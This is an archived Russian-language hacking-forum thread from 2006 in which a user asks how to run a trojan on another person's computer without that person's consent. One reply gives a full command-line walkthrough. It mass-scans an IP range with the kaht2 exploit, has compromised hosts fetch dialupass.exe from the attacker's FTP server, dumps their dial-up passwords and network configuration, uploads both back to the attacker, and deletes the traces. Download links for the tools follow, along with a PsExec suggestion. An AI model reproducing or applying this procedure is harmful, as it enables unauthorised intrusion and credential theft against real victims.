Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   как запустить файл на удаленном компьютере (https://forum.antichat.xyz/showthread.php?t=24450)

D1s0rd3r 25.09.2006 21:01

как запустить файл на удаленном компьютере
 
Доброво времени суток :)
Я незнал куда запостить но так как это связано с трояном то подумал что сюда.
А суть такова-Нада запустить файл троя на удаленном компе, а то сам юзверь не хочет, подскажите прогу или метод пажалста.
зы в поиске ничо не нашел похожево а расшаренных ресурсов много :)

tclover 25.09.2006 21:02

start filename.exe

D1s0rd3r 25.09.2006 21:19

через cmd.exe? можно поподробнее чуток...

D1s0rd3r 26.09.2006 13:26

ну кому плюсик поставить то?

D1s0rd3r 27.09.2006 13:42

Ну мне поможет кто? где кулхацкеры? :)

cardons 27.09.2006 13:45

Вот держи.К примеру используй сплоит kaht2
Скачиваем вышеуказанные файлы. Создаем папки 'D:\scan\kaht2', 'D:\scan\kaht2\ftp', 'D:\scan\kaht2\ftp\upload', 'D:\scan\kaht2\ftp\download'.
Распаковываем kaht2.zip в папку D:\scan\kaht2, ftp.zip - D:\scan\kaht2\ftp, dialupass.zip - в D:\scan\kaht2\ftp\download.

Запускаем наш FTP сервер и заходим в раздел User Accounts.
Если уже есть какие-то созданные пользователи, то удаляем их. Жмем на кнопку ADD, вводим имя юзера 'upload' и жмем ОК. Выбираем путь до папки D:\scan\kaht2\ftp\upload и жмем OK. В поле Password вводим upload, ставим галочки как на рисунке и жмем Update.

Снова жмем на кнопку ADD, вводим имя юзера 'download' и жмем ОК. Выбираем путь до папки D:\scan\kaht2\ftp\download и жмем OK. В поле Password вводим download, ставим галочки как на рисунке и жмем Update.

Всё, ftp настроен, переходим к самому главному.
Запускаем ftp-сервер, нажав на зеленую кнопку в вверху и переходим в раздел Server Log.
Жмем на выполнить в меню пуск

Вводим cmd и жмем OK

В окне вводим D:, жмем Enter, вводим cd scan\kaht2 и снова жмем энтер.

Теперь запускаем сам кахт. вводим kaht2.exe 57.66.134.0 57.66.134.255 20 и жмем Enter. Начинается процесс сканирования.
Если у вас не появилось ни одной подобной строчки

значит, беда с файрволом или там провайдером. Отключаем файрвол или меняем своего прова. Идеальными провайдерами для использования кахта однозначно являются Equant, GIN и AT&T.
Если же всё сканится, то ждем появления пободной строчки

Набираем cd.., жмем Enter, cd temp и снова жмем Enter.

Набираем следующую команду (вместо 57.66.158.238 вписываем СВОЙ ip):
echo open 57.66.158.238>download&&echo download>>download&&echo download>>download&&echo get dialupass.exe>>download&&echo bye>>download
И жмем Enter, далее набираем ftp -s:download, жмем ENTER,
Потом того как она выполнится и появится мигающий курсор по порядку выполняем ещё три команды, после набора каждой нажимаем Enter:
dialupass.exe /allusers /stext dialupass.txt
ipconfig /all>ip.txt
set a=%random%
В окне должно получиться нечто следующего типа:

Вводим dir dialupass.txt и жмем ENTER, до тех пор пока не появится следующая строчка:

Как тока она появилась вводим следующую команду и жмем ENTER:
echo open 57.66.158.238>upload&&echo upload>>upload&&echo upload>>upload&&echo mkdir %a%>>upload&&echo cd %a%>>upload&&echo send dialupass.txt>>upload&&echo send ip.txt>>upload&&echo bye>>upload
А потом вводим ftp -s:upload и опять жмем ENTER:
В окне должно отобразиться нечто похожее на это:

Подчищаем за собой следы.
del * /F/Q
И идем в поисках новой жертвы
exit

Brun 27.09.2006 14:05

Тут можна вообще целую статтю написать (для новиччьков). Но потому как таковых мало то идём на http://www.sysinternals.com/

Для D1s0rd3r . Иди сюда.
http://www.sysinternals.com/Utilities/PsExec.html
Скачай это : http://download.sysinternals.com/Files/PsExec.zip
Запускай вот так :
psexec [\\computer[,computer[,..] | @file ][-u user [-p psswd]][-n s][-l][-s|-e][-i][-x][-c [-f|-v]][-d][-w directory][-<priority>][-a n,n,...] cmd [arguments]
И радуйся.
Работать будет если ты админ. Ну это и так понятно должно быть.

Для всех интузиастов берём все итилики от сисинтерналс : http://download.sysinternals.com/Files/PsTools.zip
Если что не понятно по тулзах, то спрашивайте. Гы... Хотя там всё должно быть понятно...

З.Ы. Я когдато писал GUI для PSTools. Если кому интересно то и исходники могу дать. Но маненько не доделал :-(

D1s0rd3r 27.09.2006 14:38

cardons
это все конешно хорошо но нет ссылок на скачку.
Brun
как я понял файл (http://download.sysinternals.com/Files/PsExec.zip)
запустить на нужном мне компе?а куда эти параметры вписать?

cardons 27.09.2006 14:48

http://sokolkil.narod.ru/xxx/dialupass2.zip - dialupass
http://www.web-hack.ru/download/download.php?go=81 - В этом архиве есть kaht2

Brun 27.09.2006 14:50

Запускаеш на своём а в параметрах пишеш на каком компе что запустить.


Время: 23:29